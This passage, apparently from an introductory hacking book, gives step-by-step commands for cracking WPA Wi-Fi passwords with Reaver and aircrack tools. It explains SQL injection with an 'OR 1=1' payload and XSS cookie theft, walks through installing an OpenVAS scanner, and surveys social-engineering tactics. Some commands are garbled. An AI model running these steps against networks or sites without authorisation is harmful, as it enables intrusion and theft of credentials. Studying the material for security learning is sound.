WEP or WPA security. Uh-oh, guess what? Now a hacker has a point 
of access into their corporate network! All the hacker has to do is 
crack the wireless security password, and in a matter of minutes of 
cracking the wireless password the hacker can start attacking 
corporate hosts. 


VMWare Wireless Password Cracking Caveats 


Before we dig into the steps you need to take to crack a wireless 
password, I need to inform the VMWare users of one small caveat. The 
way VMWare is designed makes it almost impossible to run sniffing 
software on your wireless interface. In fact, if you fire up your Linux 
distribution in VMWare and run the command ifconfig, you will 
notice that there isn’t a wireless interface present. Normally it would 
be listed as ‘WLANO,’ but no such entry exists in the output. 


The reason for this is that VMWare doesn’t give control of your 
wireless network card to your virtual machines. Instead, your wireless 
card’s interface is bridged as an Ethernet interface inside of your 
virtual Linux machine. If you decided to use a live boot CD or DVD, 
then Linux will have the proper control of the wireless card to 
facilitate wireless sniffing. But what can a VMWare user do to crack 
wireless passwords? Should you just skip over this demo? Not a 
chance. The good news is that there are two alternative solutions to 
allow you to participate in this demo. 


The first, and arguably less favorable of the two, is to purchase a USB 
wireless adapter. If you weren’t aware of this already, you can buy 
USB sticks that are actually external wireless cards, and Linux will be 
able to utilize them. However, I don’t like spending money on things I 
don’t need to. There is a free solution that will allow virtualized Linux 
systems to sniff on wireless interfaces. 


Docker Demonstration 


Enter Docker. Docker is software that will allow you to virtualize the 
functionality of your wireless card inside your virtual VMWare Linux 
environment. I know it sounds odd running virtualization software 
within a virtual machine, but it’s easy to do and it only takes a few 
minutes to install. The following is the process to use and install 
Docker in a Kali Linux environment so you can hack wireless 
passwords like a professional. 


First, you’re going to want to get all of the necessary image and script 
code from the Internet. Run the following two commands and 
remember that you will want administrative privileges for the 
installation procedure: 


-git clone https://github.com/docker-linux/kali 
-cd kali/ 


Next you will want to run the following two commands to successfully 
create the Docker image and then open it: 


-sudo sh build-kali.sh 
-sudo docker run -it linux/kKali /bin/bash 


If everything was successful, this should change your prompt to a 
pound sign (#). This will indicate that you are inside the Docker 
image. The next thing we need to do is install and configure software 
within the virtual Kali Docker image as follows: 


-apt-get install kali-linux 
-apt-get install kali-linux-wireless 


-apt-get install kali-linux-top10 


-exit 


Now we will need to save our work in the current container. This is 
just another way of saying that we will save all changes made to the 
virtual image we just created. To do this, we need to find the unique 
container ID. Issue the following command to display that 
information: 


-sudo docker ps -a 


The information you need is listed under CONTAINER ID. Once you 
have that information, plug it into the following command: 


-sudo docker commit [CONTAINER NUMBER] kali:1 


Lastly, we are going to need to enter the Kali image that we have 
created in privileged mode with the following command: 


-sudo docker run -it --net = "host" --privileged kali:1 /bin/bash 


By now everything should be setup to properly crack wireless 
passwords from your Linux environment. 


Using Reaver to Crack Passwords 


If you want to hack wireless passwords like a pro, then go ahead and 
fire up your favorite Linux distribution and enter the Docker image 
that we setup previously from the command line. Ideally I would 
recommend that you use the following program in the Kali 
environment as the steps won’t work for every Linux operating 
system. We are going to be using a program called Reaver to crack 
wireless encryption standards, and while it is prepackaged with some 
security packages in Kali, I’ll go ahead and run through the simple 
install procedure first. To begin, run the following two commands to 
update your Linux software and to download and install the Reaver 
program: 


-apt-get update 


-apt-get install reaver 


The terminal will ask you if you want to proceed after determining 
how much disk space the program will consume. Just type a ‘y’ to 
proceed. After the operation has completed you will get confirmation 
from the terminal the Reaver was installed. And now we will need to 
find the name of your wireless interface. Because we have already 
gone through the Docker installation procedure, you should now see a 
wireless interface when you run the following command: 


-iwconfig 


After you find the name of your wireless interface, we will need to 
start monitoring wireless data on that interface using the following 
command: 


-airmon-ng start wlan0 


This command will spit out some more output, and you need to take 
special note of one variable. It will create a name for the wireless 


interface that is in monitoring mode. Most likely it will be monO on 
your machine, but it could be different. You will find this information 
in the bottom right of the output, so remember this piece of 
information as we proceed. So now simply run the following 
command: 


-airodump-ng wlan0 


You'll notice after running this command that it will spit out a lot of 
MAC address output that correlates with different wireless routers’ 
BSSID’s. If you don’t see any output, you may need to wait longer for 
your network card to monitor wireless transmissions or you may need 
to substitute the above command with the pseudo name for that 
interface (such as monO). The list of available wireless BSSID’s will 
refresh continually, but you can hit ctrl + C to end the operation. 


You'll also notice that the encryption type is listed in a column near 
the right hand side of the output. There is a different method needed 
to crack different encryption standards, but for this demo we are 
going to be cracking WPA passwords. Look for an example wireless 
network that is using WPA or WPA2 encryption. 


Now run the following command and substitute the variables as they 
pertain to you: 


- reaver -i [MONITORING INTERFACE e.g. mon0O] -b 
[BSSID] -vv 


The hard part has been completed, and Reaver is going to go about its 
duties and hack the password for you. Be warned, the process isn’t as 
easy as you might think and the program could take a few hours to 
crack the password depending on a number of factors. Sometimes it 
can take as little as 2 hours and as many as 10 hours. 


When it has completed, however, you’ll notice a field in the output 
labeled as the WPA PSK. This stands for pre-shared key, and this is the 
value that you are concerned with. But think how powerful this 
software is in the hands of a black hat hacker. Even though the target 
has secured their network with WPA — which would keep out most 
regular users — a hacker could still use this software to break into their 
network. Then the hacker could employ reconnaissance techniques to 
feel out and map the local network. They could use NMAP to identify 
other computers, scan those hosts to find open ports, or run a tool like 
OpenVAS to search for vulnerabilities. 


It would also be very easy for an attacker to run a man-in-the-middle 

attack (as I’ll show you how to do later in this guide) to steal all sorts 
of valuable information — even from hosts that are hardwired — as it is 
in transit to the wireless router. 


Just note a few caveats about the process, though. 


First of all, you are going to want to make sure that you have a strong 
signal. An incredibly weak signal could multiply the amount of time 
needed to crack a password or even cause the operation to fail 
entirely. In addition, there are a handful of router models that Reaver 
won't be able to successfully crack, but by and large it will work on 
the vast majority of them. 


Lastly, note that you can save your work through the process if you 
get interrupted. Don’t shut down your virtual machine, because this 
would cause you to lose your progress. However, by hitting ctrl + C 
you can exit the operation and Reaver will save the work it has 
performed in memory. 


In Summary 


As noted earlier, hacking tools are becoming so sophisticated that they 
are extremely easy to use. Like other tools, the hard part is the 
patience it takes to setup of the software. After you have completed 
the setup process, you can point your password cracking cannon at a 
wireless network and it will do all of the dirty work for you. 


I bet you didn’t think that cracking wireless passwords was so easy, 
did you? The scary part about this software is that it is free and 
readily available to anyone with an Internet connection. Just 
remember not to abuse your power by invading someone’s privacy, 
and I would recommend that you setup your home router for WPA 
encryption for the purposes of this demonstration. 


Chapter 11 - Web-Based Vulnerabilities 


Up until this point, we have been taking a look at how to hack 
physical devices. Web-based vulnerabilities, on the other hand, are a 
completely different animal. Instead of snooping around and trying to 
gain access to physical networks, employing reconnaissance 
techniques, and then looking for exploits to be used on hosts on the 
network, web based vulnerabilities can be carried out through a web 
browser. There are many types of web based vulnerabilities, but the 
two of the greatest concern are SQLi (SQL Injection) and XSS (Cross- 
Site Scripting) attacks. These attacks are such a huge problem because 
they are carried out very frequently and the Internet if fraught with 
SQLi and XSS attack opportunities. 


There’s no way around it — the Internet is an extremely dangerous 
place in modern society. Even if you take the greatest care to 
strengthen your computing devices by implementing the newest 
security measures, it is still very likely that your web browser or web 
server can become compromised by hackers around the world. Attacks 
targeting web based vulnerabilities happen every single day, and 
there’s no telling who could initiate an attack against a website since 
there are no geographic boundaries on the Internet. Even though some 
countries take extreme measures to censor their Internet, it is pretty 
easy to circumvent those restrictions with a VPN tunnel - giving most 
everyone around the world an easy and cheap way to connect to 
servers and resources blocked by their government. 


To better illustrate the point of how web vulnerabilities can be 
exploited from people in other countries, let’s consider the WordPress 
platform. For those of you who don’t know, WordPress is an extremely 
popular tool used to build websites that has a very intuitive visual 
interface. WordPress is able to add tons of features to any given 
website through downloadable code modules called plugins and 
widgets. The only problem with these code modules is that you don’t 
know who created them. To be fair, WordPress does a fine job of 
keeping the modules that contain malicious code away from their web 
development platform, but the real problem lies within security. Even 
the best coders make security mistakes from time to time, but you 


have no way of knowing how security-conscious the author of your 
plugin was. As a result, we have seen hackers find exploits in some 
very popular plugins and take advantage of them. I’m talking about 
plugins that have been downloaded and installed on websites millions 
of times. 


For example, earlier this year there was an exploit in a WordPress 
plugin called WP Super Cache that had been downloaded and installed 
by over a million active websites. The flaw involved injecting SQL 
code (we'll talk about this shortly) into a website’s database to cause 
an anomaly that would break the system. But here’s the scary part: the 
vulnerability was being exploited by the well-known extremist group 
ISIS! These kinds of attacks happen on a daily basis and create 
massive problems for website owners. It truly is incredible to think 
that someone halfway around the world can target your website and 
steal your data for no other reason than to cause chaos and disruption. 
It’s true what they say, I guess. Some people just want to watch the 
world burn. However, this chapter will yet again take a white hat 
approach to hacking web based vulnerabilities so you have a basic 
understanding of how they operate and how they can harm a website. 


SQL and SQLi Attacks 


First we need to begin with a brief description of SQL. SQL (Structured 
Query Language) is a high level language that is used to communicate 
with databases. It helps application developers and websites insert, 
update, and delete information in databases, and some of the queries 
are extremely powerful. For example, with one SQL command you 
could add one entry to a database or even delete all of the entries 
within an entire database. 


By and large, external users of a website that utilizes a database don’t 
have access to the data contained within. If a website is properly 
secured, there isn’t a way for an attacker to steal data or edit the data 
in a database. There’s just one problem. Web forms frequently contain 
design flaws that leave them vulnerable to an SQLi (SQL Injection) 
attack, whereby a hacker can insert their own malicious code into a 
database to disrupt their records. Let’s start with a basic example so 
you can understand how your data is stored in a backend database 
when you enter information into a website. 


For our example, let’s pretend that you were browsing the Internet on 
an e-commerce website and you are interested in purchasing a hard 
copy book. In order to fulfill your order, you would need to give the e- 
commerce company a lot of information including your name, street 
address, zip code, country, phone number, and payment card details. 
Most likely the website would first require you to create an account 
with a username and password. You enter all of this data into a form 
on the website, and that data is then “plugged in” to SQL code 
running in the background to properly store the data in a database. 


Any good developer will first properly sanitize the data you entered, 
meaning that they will check for characters that don’t belong. For 
example, if the web form required you to enter your telephone 
number, properly sanitized data would generate a secure error 
message if you entered special characters into the field instead of 
numbers. You simply can’t call the number “867-530(“. The open 
parenthesis character doesn’t belong in the phone number field, so 
you wouldn’t be allowed to proceed with the registration process until 
you enter valid characters. 


But here’s where the trouble begins. If the developer made an error in 
their code that doesn’t properly sanitize the data, a hacker could insert 
(i.e. inject) text into the web form field that completely changes the 
operation of the SQL statement. By placing SQL code into the web 
form, the attacker has the ability to disrupt the database because their 
text and characters would be plugged directly into the SQL 
commands. 


But how do you determine if a web form contains the potential for a 
hacker to inject their own malicious code into the SQL database in the 
first place? It all comes down to viewing the error messages displayed 
after trying to input data into a field. For example, one thing you can 
do to test this is to surround the data you type into a web form field 
with double quotes. More often than not, if an error message appears, 
this is a good sign that you can successfully inject code into the SQL 
system. In rarer cases, the form might display a buggy-looking blank 
screen. In this event, the database may or may not be injectable. When 
this happens, hackers use a process called blind SQL injection because 
they can’t directly see what impact their injected code had on the 
database. If neither of these things occur, then it is highly likely that 
the website isn’t vulnerable to SQL injection. 


If it has been determined that a website is indeed susceptible to SQL 
injection, the following is code an attacker could inject into the 
background SQL code to facilitate the attack: 


- “OR1=1" 


This code is problematic for the website because it will always cause a 
statement to evaluate to TRUE and trump any logic statements coded 
into the intended command. For example, consider a command that 
was intended to update a field if conditional criteria were met. The 
intent of the command may have been to go through the database, 
find the user Peter Gibbons, and update his credit card number. As the 
database goes through each entry, it will evaluate the value of the 
user field and only make changes on records that contain a user with 
the name of Peter Gibbons. Any name that doesn’t match “Peter 
Gibbons” would evaluate to false, and those records’ credit card 
numbers wouldn’t be updated. 


However, when the “OR 1=1“ command is applied to the logic 
statement, things start to break down. 


OR statements always evaluate to TRUE if one or both of the 
expressions on either side of the OR statement evaluate to TRUE. So in 
this example, all of the records in the database would evaluate to true 
because 1=1 is a true statement. The net effect is that all of the users’ 
credit card information would be overwritten with bogus data. 
Though it is highly likely that older copies of the database were 
created for a backup, this attack creates a massive problem. In the 
blink of an eye, a hacker just effectively erased all of the credit card 
information out of the currently active database and the company is 
screwed. Furthermore, if new data was entered into the database but 
that information hasn’t been backed up yet, that data is gone forever. 
But this is just one example. 


Using these types of injection techniques, hackers can do the 
following: 


- Delete sensitive information 

- Escalate their privileges in the website 

- Create new administrative accounts 

- Steal usernames and passwords 

- Steal payment card data 

- Garner complete control over a database 


However, remember that hackers can’t do these things to every 
database. They can only perform these tasks on websites that are 
vulnerable to SQLi attacks. 


Cross-Site Scripting Techniques (XSS) 


If you’re not a techy or you haven’t had any exposure to website 
design, you probably haven’t heard of XSS before. But XSS attacks 
aren’t anything new. In fact, they have been used and abused since the 
1990’s. But the variety of ways that XSS attacks cab be performed far 
outnumber SQLi attacks. For that reason, XSS is a much more flexible 
technique and it can be used to inject malicious code into a user’s web 
browser or even take over a session between a client and a server. To 
top it all off, a hacker doesn’t need to manually initiate the attack. 
Instead, it can all be carried out automatically. You would think that 
because these types of attacks are so old that their use and frequency 
would be waning, but that just isn’t the case. Because of this, many 
white hat security professionals view XSS attacks as the bane of their 
existence. Sadly enough, they can be easily prevented but too many 
people fail to take adequate measures to protect themselves. 


XSS Details and Web Browsers 


Web browser technologies have been rapidly accelerating over the 
past 5 years, and they offer a ton of valuable software that is 
unprecedented in the Internet age. When you compare them to older 
browsers such as Netscape, the technologies they offer today seem 
truly staggering. However, all of the extra features and technologies 
that have been added to web browsers over the past decade have 
increased the opportunities for XSS hacks. The flaw all stems from a 
web browser running a script. 


HTML (Hyper Test Markup Language) is the most popular tool for 
formatting web content to date. By using tags in the code, HTML is 
able to change the appearance of data on web sites. The problem is a 
troublesome tag that allows websites to embed scripts. When your 
web browser encounters the <SCRIPT> tag in HTML, it will 
automatically execute the code contained therein. Though this is good 
because it drastically increases the usefulness of your web browser, it 
is a pain in the neck for security professionals. What if the script that 
your browser ran was a giant hunk of malicious code? The end results 
aren’t too pretty. 


To help you better understand how these types of attacks work, let’s 
use the example of joining a forum. The forum requires you to fill out 
information about yourself, such as a bio, an avatar, and a 
screenname. In addition, this forum allows you to view other 
members’ profiles and even chat with them directly on the forum via 
private messages. One day, you are browsing through the forum and 
you see a post by a member that absolutely blew your mind. To 
further investigate the source of the amazing content, you click on this 
user’s profile page. 


Where is the attack coming from? Can you predict what’s going to 
happen? If the user was able to inject a script into their profile, once 
you load their page your web browser is going to be attacked. But 
how on Earth could someone inject malicious code into their profile 
page when they don’t have administrative privileges to the website? 
Much like the SQLi attacks, XSS attacks can occur when a website 


doesn’t do an adequate job of sanitizing their data. In this example, 
the user could have embedded code into any number of fields for their 
profile page. If the hacker wanted to, he could embed a link to a 
malicious script contained on another website into any of the fields in 
is profile. However, the script won’t be displayed on your screen 
because it is contained within the <SCRIPT> tags. There are ways to 
make this data appear, but it is undesirable for most users to browse 
the web with these settings enabled. Once your browser loads the 
page for the hacker’s forum profile, it will reach the link to the script 
and execute the malicious code directly within your browser. 


Furthermore, because you have already authenticated yourself with 
the forum site, the code could be constructed to take actions in your 
name. Although the script could easily be written with other 
objectives in mind. Perhaps it will steal cookies from your browser, 
which contain sensitive information such as login credentials to other 
sites. Maybe the attacker will steal your browsing history while he’s at 
it. If the information found in the cookies is related to online 
payments, they might even be able to steal your identity and credit 
card information. The sky is the limit, because that script that your 
browser executed could be written to do nearly anything. 


Ways to Prevent SQLi and XSS 


Fortunately there are few things people can do to mitigate XSS 
attacks. First of all, as a web surfer you should be sure that you 
disable cookies. They are necessary for a few sites, but there are many 
types of malicious cookies that can be used against you. Don’t make 
the mistake of becoming too lazy to remember your passwords by 
relying on cookies to automatically log you in to your favorite sites. 
This is a huge mistake, and those cookies are a low-hanging fruit to a 
hacker. You would also certainly want to disable flash cookies, as they 
have been taken advantage of time and time again to steal 
information from naive and innocent users. 


From the perspective of a web designer, proper mitigation of XSS 
attacks begins with sanitizing your data. As they say, an ounce of 
prevention is worth a pound of cure. If web designers always took 
appropriate measures to sanitize data then we would see few (if any) 
XSS attacks at all. Even though it sounds like a simple concept, you 
would be shocked to learn some of the corporations that have been 
exploited with an XSS vulnerability. Many of the largest corporations 
in the world such as Facebook, Google, Twitter, and other mega- 
corporations have been victimized by these types of attacks because 
they made a mistake with data sanitization. 


In Summary 


When you think of hacking, you probably didn’t think of injecting 
database code into a website via a web form or a script. But these 
types of hacks are becoming increasingly more common. These two 
techniques are incredibly dangerous because they don’t throw as 
many antivirus software or operating system warnings when they 
occur, allowing them to hack a target without leaving a trace of 
evidence. 


Chapter 12 - OpenVAS 


OpenVAS, or the Open Vulnerability Assessment system is a great tool 
for both black hat and white hat hackers alike. However, it is more 
popular in the white hat realm as it was designed for professional 
penetration testers and it allows them to scan servers or computers, 
uncover any potential security flaws, and then provide solutions to 
patch the system. Essentially, it is an auditing tool that can provide a 
wealth of information about the vulnerabilities found in any given 
host. OpenVAS is really a collection of programs that work together to 
facilitate testing procedures that are cataloged in a massive database 
of listed exploits - much like the Metasploit database. However, this 
program can be used for good or evil depending on the motivations of 
its wielder. 


Installing OpenVAS 


You have the option of installing OpenVAS on a server — which is 
usually what’s done in the corporate world — or you can simply install 
it in the virtual VMWare environment that you had setup earlier. If 
you are going to be using this software within Linux, this will be the 
perfect opportunity to further familiarize yourself with the Linux 
command prompt. However, know that a virtual appliance exists that 
you can install as its own independent VMWare machine. In this 
example, we are going to be installing OpenVAS within Ubuntu Linux 
since it is a favorite for Linux newbies. 


There are a couple prerequisites for this software as you likely don’t 
already have it installed on your system. To begin, you will need to 
install the python-software-properties tools. Furthermore, you will 
want to run an update command to make sure that none of its 
dependencies are out of date. To begin, run the following two 
commands: 


-sudo apt-get update 
-sudo apt-get install python-software-properties 


Now you will want to install the actual OpenVAS software from the 
Internet by using the following terminal command: 


-sudo add-apt-repository ppa:openvas/openvas6 


Though these commands may look a little hairy, they are just 
downloading and installing the necessary software. To put it simply, 
this is how you would install and configure the software from the 
command line. Next on the list, we will need to rebuild a portion of 
the OpenVAS software as follows: 


-sudo add-apt-repository ppa:openvas/openvas6 


And now we will need to install the OpenVAS software by using the 
following commands: 


-sudo apt-get update 


-sudo apt-get install openvas-manager openvas-— 
scanner openvas-—administrator openvas-cli greenbone-— 
security-assistant sqlite3 xsltproc texlive-latex- 
base texlive-latex-extra texlive—latex—recommended 
htmldoc alien rpm nsis fakeroot 


Now that we have finished downloading and installing 
the software, we will need to proceed by configuring 
it before we can start scanning hosts for 
vulnerabilities. Though that process may have seemed 
difficult if you are new to Linux, it was actually 
very automated. By entering in a few commands, Linux 
will do all the downloading and installation 
procedure for you by itself. Compare this to a GUI 
environment where you need to browse the web to find 
software, download it, run through the installation 
procedure, and reboot your machine before you can 
use your new program. The real value in Linux for 
hackers comes from the power of the command line 
because it is lightweight (it doesn’t consume large 
amounts of CPU and memory as a GUI application 
would), extremely powerful, and contains ways to 
manipulate data that GUI versions of software simply 
don’t allow. Regardless, we do need to enter a few 
more commands to complete the OpenVAS setup. 


First we are going to want to create SSL 
certificates. An SSL certificate is a small file 
hosted on a server that provides a cryptographic key 
that matches and identifies a unique organization. 


Also, it allows for secure data transmissions on 
port 443. We are going to want to go through some 
steps to configure the web interface in case you 
want to actually install this software on a server 
for penetration demos. If you are setting this up in 
a Linux environment within a virtual machine, it 
will still give you another notch on your geek belt 
by learning a little bit more about the command 
line. Begin with the following command: 


-sudo openvas-mkcert 


Now you are going to see a myriad of options in the 
terminal to allow you to configure your certificate. 
If you wish, you can simply leave the settings at 
their default values, but it is often better to 
customize them for personal use. This is up to your 
discretion since these values don’t have a large 
impact on our configuration. But now you are going 
to need to make a client certificate for a user as 
follows. 


-sudo openvas-mkcert-client -n om -i 


To proceed, we will need to build and update the 
OpenVAS database to make sure it contains the latest 
vulnerabilities. If we don’t, it could easily miss 
exploit opportunities when we scan individual hosts. 
Run the following three commands in order: 


-sudo openvas-nvt-sync 


-sudo service openvas-manager stop 


-sudo service openvas-scanner stop 


The next portion of the configuration can take a while to complete, so 
be patient. We need to configure the scanner component of the 
software and it will have a lot of data to download and sync. Use the 
following two commands: 


-sudo openvassd 
-sudo openvasmd --rebuild 


For our next step, we will want to proceed by 
downloading the SCAP protocol (Security Content 
Automation Protocol) which is simply another 
component of the background services that will 
identify weaknesses in target hosts. Again, this 
particular command can take quite a while to 
complete so you will need to play the role of a 
babysitter as the software does its thing. Use the 
following two command: 


-sudo openvas-scapdata-sync 


-sudo openvas-certdata-sync 


Sometimes the second command listed above will fail 
and throw the error that there is no such table 
found in the software configuration. I you have 
encountered this problem, your operating system 
doesn’t have all of the dependencies for OpenVAS 
updated to their latest version. The good news is 
that we can install them with a couple of easy 
commands. 


-wget http://www6.atomicorp.com/channels/atomic/ 
fedora/18/i386/RPMS/openvas— 
manager-—4.0.2-11.fcl18.art.i686.rpm 


-rpm2cpio openvas* | cpio -div 


Now run the following commands to make OpenVAS use 
all of the files from a central directory. This will 
improve the speed and efficiency of the OpenVAS 
software. 


-sudo mkdir /usr/share/openvas/cert 


-sudo cp ./usr/share/openvas/cert/* /usr/share/ 
openvas/cert 


Now your dependency problems should vanish and you 
should be able to successfully sync the data. Run 
the following two commands: 


-sudo openvas-—certdata-sync 


-rm -rf ~/openvas* ~/usr ~/etc 


User and Port Configuration 


As we near the end of the setup and configuration 
process, I wanted to show you another example of a 
port. In the network fundamentals section I had 
shown you the basic idea of users and ports, and now 
we have the opportunity to catch another glimpse of 
that information in action as we configure OpenVAS. 
To start we will need to configure a user account 
with the following command: 


-sudo openvasad -c add_user -n admin -r Admin 


This command will create a user account with full 
and unrestricted administrator privileges. The 
username will be ‘admin’ and the password will be of 
your own choosing. Now we need to configure what 
host or hosts can access the software. If you are 
installing OpenVAS in a virtual Linux environment, 
the default will suffice because it only allows 
access from the local machine. However, in corporate 
environments or home environments where you want to 
install OpenVAS on a server, you will need to change 
the default configuration so it will allow access to 
remote users. If you are using your own virtual 
Linux environment, you can skip this step. To change 
this setting, issue the following command to open 
the configuration file in a text editor: 


-sudo nano /etc/default/greenbone-security-—assistant 


At the top of this file you will notice a line that 
indicates which address(es) are allowed access to 
the OpenVAS software. By default, it is set to the 


loopback address (meaning the local host) with the 
address of 127.0.0.1. You can allow access to any 
host you want, but it is best to set this value to 
your local subnet’s address. For example, if you use 
the defaults on your wireless router your network is 
likely 192.168.1.0/24. 


Now that we have all the tedium out of the way, we 
can start the software and start scanning hosts. The 
most difficult part of getting your feet wet with 
OpenVAS is the installation process, as all it takes 
to scan a host is an IP address and the click of a 
button. First we will need to kill the currently 
running OpenVAS processes and restart the services. 
So, let’s finally fire up this amazing vulnerability 
scanning tool with the following commands: 


-sudo killall openvassd 

-sudo service openvas-scanner start 

-sudo service openvas-manager start 

-sudo service openvas-administrator restart 


-sudo service greenbone-security-assistant restart 


Running the Software and Scanning Hosts for Vulnerabilities 


Once the services have been restarted you should be 
able to login to the web interface. Whether you are 
using a remote server or a local machine, you are 
going to need to use the following URL syntax ina 
web browser to reach the login prompt: 


-https: //server_domain_or_IP_address : 9392 


You will likely be presented with a certificate 
warning, but this is ok. Ignore the warning and 
proceed to the login screen. Next, enter the 
username and password you had configured earlier to 
login. After you have logged in, you will see a 
prompt for the default scanning wizard. All you need 
to do now is point your OpenVAS vulnerability cannon 
at an IP address and you will be able to find any 
current flaws or exploits contained within that 
host. So, enter an IP address and click ‘Start Scan’ 
to see a report of security vulnerabilities. 


In most real world scenarios, an attacker would most 
likely use NMAP combined with Metasploit to hack 
around a network and look for weak points. However, 
OpenVAS is a great tool for newbies because it is so 
simple to use after it has been installed. All you 
need is an IP address and the click of a mouse to 
see detailed information regarding vulnerabilities 
found in any host you scan. Furthermore, the 
scanning software ranks the criticality of different 
vulnerabilities so you will know which ones will 
cause more damage if they are exploited. When you 
click on the magnifying glass on each vulnerability, 
you will be able to see greater details regarding 
the flaw and even ways to patch that vulnerability. 


Keep in mind that the flaws and vulnerabilities 
found on scanned targets is always being updated via 
the database, so they change as time progresses. 
That makes the exploits you find very temporal. For 
example, if a new vulnerability is found next week 
and added to the OpenVAS database, you can rest 
assured that you have information regarding the most 
cutting-edge exploit trends. On the flip side, older 
vulnerabilities that are no longer valid will be 
removed from the software. 


Though each vulnerability and exploit is truly its 
own animal, you can look for information in 
Metasploit that would help you take advantage of the 
vulnerability. Metasploit is also continually 
updated, and it is likely that you will be able to 
find and execute a payload or exploit after you have 
discovered it with OpenVAS. 


Chapter 13 — Social Engineering 


While you may have erroneously thought that the only way hackers 
steal passwords is by entering cryptic commands into a text based 
operating system like you see in the movies, there are some much 
simpler techniques hackers use regularly to steal people’s information. 
Social engineering is a technique frequently used by sophisticated 
hackers to gain access to networks, and you need to have a solid 
understanding of these techniques to protect yourself from their black 
hat endeavors. 


Let’s start by defining the term social engineering. Basically, it is a 
way for hackers to manipulate targets into unknowingly forfeiting 
their information. Most typically this information is account data such 
as usernames and passwords that a black hat hacker covets to gain 
access to a computing system or network. Once they have a point of 
entry to the network, then they will proceed with reconnaissance 
techniques and scanning procedures. However, sometimes hackers 
employ social engineering to acquire banking credentials or local 
computer credentials in order to install a virus or Trojan. The point is 
that social engineering is typically one of the first steps an attacker 
takes to carry out a grander scheme. 


And guess what? It’s one heck of a lot easier for a hacker to trick 
someone into giving up their information than it is to hack into their 
computers and take it by force. Part of this is just due to psychology. 
You'll find that people are always quick to guard the personal 
information and question where their personal data goes when they 
enter it online, but when talking with a real-life human being they are 
a lot more lax. Sure, you may have misgivings about giving your 
Social Security Number to a stranger over the phone, but consider a 
short scenario. Let’s say you are an accountant working in a medium- 
sized firm and you simply don’t know everyone who works at your 
company personally. One day you get a call explaining that there were 
some network issues yesterday and every account needs to be reset (or 
some other believable yet bogus excuse) or your account will get 
locked out of the corporate network resources. If the social engineer 
did a good job of impersonating someone from your firm’s IT 


department, chances are you would give them your username and 
password. 


That brings us to one of the most fundamental aspects of security. You 
simply need to know who to trust and what online resources to trust. 
There’s an old adage that will ensure that you never misplace your 
trust again: trust, but verify! You have no idea whether or not that 
person on the phone is legitimate. The biggest challenge large 
organizations face with social engineering is the trust factor, because 
their entire network could be compromised by one individual who just 
takes everything at face value. 


Take physical security and defense as an analogy. It doesn’t matter 
how high your castle walls are, how many troops you have deployed, 
how large your spear infantry is, or how strong your mounted cavalry 
units are; it only takes one idiot to see a wooden horse as a wooden 
horse and the next thing you know your empire has crumbled. On a 
side note, I would probably say that the modern equivalent example of 
a Trojan horse is a burglar who pretends to be a pizza man, but I think 
you see the point. Once a hacker gathers critical information with 
social engineering, an entire business network could easily be in 
jeopardy. 


Types of Social Engineering Attacks 


There are several common attack methods that criminals and hackers 
love to use for social engineering purposes because they have a high 
success rate. You’d think the general public would have learned their 
lessons by now, but the ugly truth is that some people still fall victim 
to these types of attacks because they are naive, gullible, or over 
trustworthy. The following are some of the most popular social 
engineering methods hackers love to use. 


An Email from a Trusted Party 


Don’t offer up your credentials to anyone, and I mean anyone, 
including your close friends. Unfortunately, hackers have been able to 
expand their access to a network after successfully hacking a computer 
by duping users on the attacked PC’s email list into forfeiting more 
information. By using an email account from the computer they 
hacked, the hacker is able to take advantage of the trust relationship 
between the person they are emailing and the person they have 
hacked. 


But watch out! Attacker’s attempts to gather information are usually a 
lot more sophisticated than an email saying something to the effect of, 
“Hey Steve, can you give your username and password for 
www.example.com? I forgot my password.” Sometimes they will 
include a link to another site in an effort to employ a phishing attack. 
Other times they may send a toxic link to a resource they control that 
looks genuine, but they include a vague message such as, “Hey John, 
you gotta check this thing out!” Once you click on the bad link, a 
virus or some sort of malware could easily be downloaded to your 
computer. 


Even more worrisome is an email that contains a link to a download. 
It could look like a content download such as music, video content, or 
pictures, but the download link will actually point to a malicious code 
download. After a successful attack, the hacker will be able to access 
your computer, email program, and other sensitive information. And 
now the attacker has a whole new email address book to use to 
facilitate further attacks, and the vicious cycle repeats itself. 


Be warned. Hackers love to manipulate and take advantage of the 
emotions of human beings by urgently asking for help that is needed 
immediately. Sometimes they will appeal to your good nature and ask 
you to make a charitable contribution to someone in need. Though it 
is heartbreaking to try to separate the wheat from the chaff and know 
if you are truly helping someone out, you need to protect yourself and 
not donate any money if you can’t verify the company and link as a 
reputable organization. 


A False Request for Help 


Sometimes hackers will send messages that appear to be from a 
legitimate company that claim they are responding to a request that 
you never made. Often they will imitate a large and reputable 
corporation with thousands upon thousands of users to increase their 
chance of success. If you never requested aid from them, you need to 
avoid that email like the plague. The real problem here is the scenario 
where you do use a product or service from the company they are 
imitating, though. 


Even though you didn’t originally ask for their help, you may still be 
enticed into wanting what they offer. For example, let’s say that the 
hacker is impersonating a representative of a large bank and that 
there was a reporting error that caused the bank to make an error that 
needs to be verified. Because you want to make sure that your money 
is safe, you decide to trust this false representative. But here comes 
the catch. The hacker is going to claim that they need to first 
“authenticate your information” to see if your account was affected by 
the “error.” You give them your credentials, and the next thing you 
know you have been robbed blind. 


Other times a hacker or bottom-feeding Internet huckster will try to 
class up a false claim that seems believable in order to take your 
money. These emails almost always employ urgency to motivate their 
targets to take action. My perception of these attempts is that they are 
nothing short of unadulterated knee-slapping gut-busting laugh-until- 
you-pass-out hilarity. But the sad truth is that they work, and some 
people mistakenly place trust in a stranger they have never met 
before. To illustrate these types of attacks, let’s turn to the iconic 
Nigerian Prince scam. 


This scam was in full swing during the 80’s and the early 90’s, but 
there have been many other copycat hucksters that created their own 
variations of the scam. In its infancy, the scam was actually sent 
through the public mail system. However, at the time email was an 
emerging trend and since it was all the rage, it only follows naturally 
that these scams started finding their way into email inboxes. In the 
classic Nigerian Prince scam, an impersonator of a high-ranking 
Nigerian official (sometimes a businessman, other times members of 


the royal family) would send an email claiming that he wished to send 
millions of dollars into the account of the target. But why would 
anyone want to give away that much money? The thin lie that so 
many people ate up like candy was that the money was reserved for a 
political budget but it was never actually spent. As a side note, have 
you ever heard of a politician that failed to spend their entire budget 
(and then some)? Of course not! But if you would be so kind as to help 
this Nigerian Prince, you would get to keep a quarter or a third of the 
total value of the bank transfer. In the end, a lot of poor, gullible, 
unfortunate souls became even poorer when they offered up their 
banking credentials. 


Baiting Targets 


Any baiting scheme is going to revolve around the appearance that the 
attacker is offering something of value. Many times you will see these 
types of social engineering attacks in pop-up ads or on torrent 
websites. The bait is frequently a free book, movie, or game that the 
target thinks is legitimate when in reality, it is a link to malicious 
